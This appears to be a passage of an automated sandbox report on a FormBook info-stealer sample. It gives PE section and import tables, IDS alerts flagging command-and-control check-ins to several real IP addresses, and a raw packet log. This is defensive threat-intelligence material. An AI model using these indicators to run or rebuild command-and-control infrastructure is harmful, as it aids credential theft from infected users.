                      IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | -
                      IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x138000 | 0x7130 | .reloc
                      IMAGE_DIRECTORY_ENTRY_DEBUG | 0x92bc0 | 0x1c | .rdata
                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | -
                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | -
                      IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | -
                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xa4870 | 0x40 | .rdata
                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | -
                      IMAGE_DIRECTORY_ENTRY_IAT | 0x8f000 | 0x884 | .rdata
                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | -
                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | -
                      IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | -
                      Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                      .text | 0x1000 | 0x8dd2e | 0x8de00 | c2c2260508750422d20cd5cbb116b146 | False | 0.5729952505506608 | data | 6.675875439961112 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      .rdata | 0x8f000 | 0x2e10e | 0x2e200 | 4513b58651e3d8d87c81a396e5b2f1d1 | False | 0.3353340955284553 | OpenPGP Public Key | 5.760731648769018 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                      .data | 0xbe000 | 0x8f74 | 0x5200 | c2de4a3d214eae7e87c7bfc06bd79775 | False | 0.1017530487804878 | data | 1.1988106744719143 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .rsrc | 0xc7000 | 0x704bc | 0x70600 | a62f3544445f1ec7fdd483b0328dc404 | False | 0.9412693791713015 | data | 7.922758864147164 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                      .reloc | 0x138000 | 0x7130 | 0x7200 | 1254908a9a03d2bcf12045d49cd572b9 | False | 0.7703536184210527 | data | 6.782377328042204 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                      Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                      RT_ICON | 0xc75a8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
                      RT_ICON | 0xc76d0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
                      RT_ICON | 0xc77f8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
                      RT_ICON | 0xc7920 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | Great Britain | 0.3333333333333333
                      RT_ICON | 0xc7c08 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | Great Britain | 0.5
                      RT_ICON | 0xc7d30 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | Great Britain | 0.2835820895522388
                      RT_ICON | 0xc8bd8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | Great Britain | 0.37906137184115524
                      RT_ICON | 0xc9480 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | Great Britain | 0.23699421965317918
                      RT_ICON | 0xc99e8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | Great Britain | 0.13858921161825727
                      RT_ICON | 0xcbf90 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | Great Britain | 0.25070356472795496
                      RT_ICON | 0xcd038 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | Great Britain | 0.3173758865248227
                      RT_MENU | 0xcd4a0 | 0x50 | data | English | Great Britain | 0.9
                      RT_STRING | 0xcd4f0 | 0x594 | data | English | Great Britain | 0.3333333333333333
                      RT_STRING | 0xcda84 | 0x68a | data | English | Great Britain | 0.2747909199522103
                      RT_STRING | 0xce110 | 0x490 | data | English | Great Britain | 0.3715753424657534
                      RT_STRING | 0xce5a0 | 0x5fc | data | English | Great Britain | 0.3087467362924282
                      RT_STRING | 0xceb9c | 0x65c | data | English | Great Britain | 0.34336609336609336
                      RT_STRING | 0xcf1f8 | 0x466 | data | English | Great Britain | 0.3605683836589698
                      RT_STRING | 0xcf660 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186
                      RT_RCDATA | 0xcf7b8 | 0x67711 | data | - | - | 1.0003209840994862
                      RT_GROUP_ICON | 0x136ecc | 0x76 | data | English | Great Britain | 0.6610169491525424
                      RT_GROUP_ICON | 0x136f44 | 0x14 | data | English | Great Britain | 1.25
                      RT_GROUP_ICON | 0x136f58 | 0x14 | data | English | Great Britain | 1.15
                      RT_GROUP_ICON | 0x136f6c | 0x14 | data | English | Great Britain | 1.25
                      RT_VERSION | 0x136f80 | 0x14c | Intel 80386 COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970 | English | Great Britain | 0.5963855421686747
                      RT_MANIFEST | 0x1370cc | 0x3ef | ASCII text, with CRLF line terminators | English | Great Britain | 0.5074478649453823
                      DLL | Import
                      WSOCK32.dll | WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
                      VERSION.dll | GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                      WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
                      COMCTL32.dll | ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                      MPR.dll | WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                      WININET.dll | InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
                      PSAPI.DLL | GetProcessMemoryInfo
                      IPHLPAPI.DLL | IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                      USERENV.dll | DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
                      UxTheme.dll | IsThemeActive
                      KERNEL32.dll | DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
                      USER32.dll | AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
                      GDI32.dll | StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
                      COMDLG32.dll | GetOpenFileNameW, GetSaveFileNameW
                      ADVAPI32.dll | GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
                      SHELL32.dll | DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                      ole32.dll | CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
                      OLEAUT32.dll | LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit
                      Language of compilation system | Country where language is spoken | Map
                      English | Great Britain | -
                      Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                      2024-09-13T12:27:12.068665+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 50401 | 34.150.58.73 | 80 | TCP
                      2024-09-13T12:27:12.068665+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 50401 | 34.150.58.73 | 80 | TCP
                      2024-09-13T12:27:36.406189+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50402 | 195.24.68.25 | 80 | TCP
                      2024-09-13T12:27:38.981289+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50403 | 195.24.68.25 | 80 | TCP
                      2024-09-13T12:27:41.509593+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50404 | 195.24.68.25 | 80 | TCP
                      2024-09-13T12:27:44.114915+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 50405 | 195.24.68.25 | 80 | TCP
                      2024-09-13T12:27:44.114915+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 50405 | 195.24.68.25 | 80 | TCP
                      2024-09-13T12:27:50.249780+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50406 | 162.0.213.94 | 80 | TCP
                      2024-09-13T12:27:52.895730+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50407 | 162.0.213.94 | 80 | TCP
                      2024-09-13T12:27:55.566129+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50408 | 162.0.213.94 | 80 | TCP
                      2024-09-13T12:27:58.009578+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 50409 | 162.0.213.94 | 80 | TCP
                      2024-09-13T12:27:58.009578+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 50409 | 162.0.213.94 | 80 | TCP
                      2024-09-13T12:28:04.472198+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50410 | 154.23.184.240 | 80 | TCP
                      2024-09-13T12:28:07.016156+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50411 | 154.23.184.240 | 80 | TCP
                      2024-09-13T12:28:09.804943+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50412 | 154.23.184.240 | 80 | TCP
                      2024-09-13T12:28:12.118591+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 50413 | 154.23.184.240 | 80 | TCP
                      2024-09-13T12:28:12.118591+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 50413 | 154.23.184.240 | 80 | TCP
                      2024-09-13T12:28:18.860641+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50414 | 47.104.180.139 | 80 | TCP
                      2024-09-13T12:28:21.405375+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50415 | 47.104.180.139 | 80 | TCP
                      2024-09-13T12:28:23.960871+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50416 | 47.104.180.139 | 80 | TCP
                      2024-09-13T12:28:26.500137+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 50417 | 47.104.180.139 | 80 | TCP
                      2024-09-13T12:28:26.500137+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 50417 | 47.104.180.139 | 80 | TCP
                      2024-09-13T12:28:41.038596+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50418 | 3.33.130.190 | 80 | TCP
                      2024-09-13T12:28:42.647720+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50419 | 3.33.130.190 | 80 | TCP
                      2024-09-13T12:28:45.246673+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50420 | 3.33.130.190 | 80 | TCP
                      2024-09-13T12:28:47.750673+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 50421 | 3.33.130.190 | 80 | TCP
                      2024-09-13T12:28:47.750673+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 50421 | 3.33.130.190 | 80 | TCP
                      2024-09-13T12:29:01.458588+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50422 | 199.59.243.226 | 80 | TCP
                      2024-09-13T12:29:04.037143+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50423 | 199.59.243.226 | 80 | TCP
                      2024-09-13T12:29:06.625795+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50424 | 199.59.243.226 | 80 | TCP
                      2024-09-13T12:29:09.136695+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 50425 | 199.59.243.226 | 80 | TCP
                      2024-09-13T12:29:09.136695+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 50425 | 199.59.243.226 | 80 | TCP
                      2024-09-13T12:29:14.920189+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50426 | 162.241.226.190 | 80 | TCP
                      2024-09-13T12:29:17.468744+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50427 | 162.241.226.190 | 80 | TCP
                      2024-09-13T12:29:20.081191+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50428 | 162.241.226.190 | 80 | TCP
                      2024-09-13T12:29:22.926625+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 50429 | 162.241.226.190 | 80 | TCP
                      2024-09-13T12:29:22.926625+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 50429 | 162.241.226.190 | 80 | TCP
                      2024-09-13T12:29:29.806640+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50430 | 91.215.85.23 | 80 | TCP
                      2024-09-13T12:29:32.307060+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50431 | 91.215.85.23 | 80 | TCP
                      2024-09-13T12:29:34.992744+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50432 | 91.215.85.23 | 80 | TCP
                      2024-09-13T12:29:37.516534+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 50433 | 91.215.85.23 | 80 | TCP
                      2024-09-13T12:29:37.516534+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 50433 | 91.215.85.23 | 80 | TCP
                      Timestamp | Source Port | Dest Port | Source IP | Dest IP
                      Sep 13, 2024 12:27:11.200375080 CEST | 50401 | 80 | 192.168.2.4 | 34.150.58.73
                      Sep 13, 2024 12:27:11.205661058 CEST | 80 | 50401 | 34.150.58.73 | 192.168.2.4
                      Sep 13, 2024 12:27:11.205790043 CEST | 50401 | 80 | 192.168.2.4 | 34.150.58.73
                      Sep 13, 2024 12:27:11.216728926 CEST | 50401 | 80 | 192.168.2.4 | 34.150.58.73
                      Sep 13, 2024 12:27:11.221894979 CEST | 80 | 50401 | 34.150.58.73 | 192.168.2.4
                      Sep 13, 2024 12:27:12.068170071 CEST | 80 | 50401 | 34.150.58.73 | 192.168.2.4
                      Sep 13, 2024 12:27:12.068217993 CEST | 80 | 50401 | 34.150.58.73 | 192.168.2.4
                      Sep 13, 2024 12:27:12.068249941 CEST | 80 | 50401 | 34.150.58.73 | 192.168.2.4
                      Sep 13, 2024 12:27:12.068283081 CEST | 80 | 50401 | 34.150.58.73 | 192.168.2.4
                      Sep 13, 2024 12:27:12.068316936 CEST | 80 | 50401 | 34.150.58.73 | 192.168.2.4
                      Sep 13, 2024 12:27:12.068346024 CEST | 80 | 50401 | 34.150.58.73 | 192.168.2.4
                      Sep 13, 2024 12:27:12.068665028 CEST | 50401 | 80 | 192.168.2.4 | 34.150.58.73
                      Sep 13, 2024 12:27:12.068665028 CEST | 50401 | 80 | 192.168.2.4 | 34.150.58.73
                      Sep 13, 2024 12:27:12.069057941 CEST | 80 | 50401 | 34.150.58.73 | 192.168.2.4
                      Sep 13, 2024 12:27:12.069089890 CEST | 80 | 50401 | 34.150.58.73 | 192.168.2.4
                      Sep 13, 2024 12:27:12.069123030 CEST | 80 | 50401 | 34.150.58.73 | 192.168.2.4
                      Sep 13, 2024 12:27:12.069155931 CEST | 80 | 50401 | 34.150.58.73 | 192.168.2.4
                      Sep 13, 2024 12:27:12.069284916 CEST | 50401 | 80 | 192.168.2.4 | 34.150.58.73
                      Sep 13, 2024 12:27:12.069284916 CEST | 50401 | 80 | 192.168.2.4 | 34.150.58.73
                      Sep 13, 2024 12:27:12.073551893 CEST | 80 | 50401 | 34.150.58.73 | 192.168.2.4
                      Sep 13, 2024 12:27:12.073584080 CEST | 80 | 50401 | 34.150.58.73 | 192.168.2.4
                      Sep 13, 2024 12:27:12.073617935 CEST | 80 | 50401 | 34.150.58.73 | 192.168.2.4
                      Sep 13, 2024 12:27:12.073738098 CEST | 80 | 50401 | 34.150.58.73 | 192.168.2.4
                      Sep 13, 2024 12:27:12.073841095 CEST | 50401 | 80 | 192.168.2.4 | 34.150.58.73
                      Sep 13, 2024 12:27:12.074103117 CEST | 50401 | 80 | 192.168.2.4 | 34.150.58.73
                      Sep 13, 2024 12:27:12.272926092 CEST | 80 | 50401 | 34.150.58.73 | 192.168.2.4
                      Sep 13, 2024 12:27:12.272965908 CEST | 80 | 50401 | 34.150.58.73 | 192.168.2.4
                      Sep 13, 2024 12:27:12.273000002 CEST | 80 | 50401 | 34.150.58.73 | 192.168.2.4
                      Sep 13, 2024 12:27:12.273035049 CEST | 80 | 50401 | 34.150.58.73 | 192.168.2.4
                      Sep 13, 2024 12:27:12.273166895 CEST | 50401 | 80 | 192.168.2.4 | 34.150.58.73
                      Sep 13, 2024 12:27:12.273166895 CEST | 50401 | 80 | 192.168.2.4 | 34.150.58.73
                      Sep 13, 2024 12:27:12.273204088 CEST | 80 | 50401 | 34.150.58.73 | 192.168.2.4
                      Sep 13, 2024 12:27:12.273241997 CEST | 80 | 50401 | 34.150.58.73 | 192.168.2.4
                      Sep 13, 2024 12:27:12.273292065 CEST | 50401 | 80 | 192.168.2.4 | 34.150.58.73
                      Sep 13, 2024 12:27:12.273313046 CEST | 80 | 50401 | 34.150.58.73 | 192.168.2.4
                      Sep 13, 2024 12:27:12.273345947 CEST | 80 | 50401 | 34.150.58.73 | 192.168.2.4
                      Sep 13, 2024 12:27:12.273379087 CEST | 80 | 50401 | 34.150.58.73 | 192.168.2.4
                      Sep 13, 2024 12:27:12.273421049 CEST | 50401 | 80 | 192.168.2.4 | 34.150.58.73
                      Sep 13, 2024 12:27:12.274087906 CEST | 80 | 50401 | 34.150.58.73 | 192.168.2.4
                      Sep 13, 2024 12:27:12.274142027 CEST | 50401 | 80 | 192.168.2.4 | 34.150.58.73
                      Sep 13, 2024 12:27:12.274287939 CEST | 80 | 50401 | 34.150.58.73 | 192.168.2.4
                      Sep 13, 2024 12:27:12.274338007 CEST | 80 | 50401 | 34.150.58.73 | 192.168.2.4
                      Sep 13, 2024 12:27:12.274372101 CEST | 80 | 50401 | 34.150.58.73 | 192.168.2.4
                      Sep 13, 2024 12:27:12.274390936 CEST | 50401 | 80 | 192.168.2.4 | 34.150.58.73
                      Sep 13, 2024 12:27:12.274420977 CEST | 80 | 50401 | 34.150.58.73 | 192.168.2.4
                      Sep 13, 2024 12:27:12.274452925 CEST | 80 | 50401 | 34.150.58.73 | 192.168.2.4
                      Sep 13, 2024 12:27:12.274475098 CEST | 50401 | 80 | 192.168.2.4 | 34.150.58.73
                      Sep 13, 2024 12:27:12.275105000 CEST | 80 | 50401 | 34.150.58.73 | 192.168.2.4
                      Sep 13, 2024 12:27:12.275135994 CEST | 80 | 50401 | 34.150.58.73 | 192.168.2.4
                      Sep 13, 2024 12:27:12.275182009 CEST | 80 | 50401 | 34.150.58.73 | 192.168.2.4
                      Sep 13, 2024 12:27:12.275213957 CEST | 50401 | 80 | 192.168.2.4 | 34.150.58.73
                      Sep 13, 2024 12:27:12.275298119 CEST | 50401 | 80 | 192.168.2.4 | 34.150.58.73
                      Sep 13, 2024 12:27:12.275512934 CEST | 80 | 50401 | 34.150.58.73 | 192.168.2.4
                      Sep 13, 2024 12:27:12.275543928 CEST | 80 | 50401 | 34.150.58.73 | 192.168.2.4
                      Sep 13, 2024 12:27:12.275576115 CEST | 80 | 50401 | 34.150.58.73 | 192.168.2.4
                      Sep 13, 2024 12:27:12.275612116 CEST | 50401 | 80 | 192.168.2.4 | 34.150.58.73
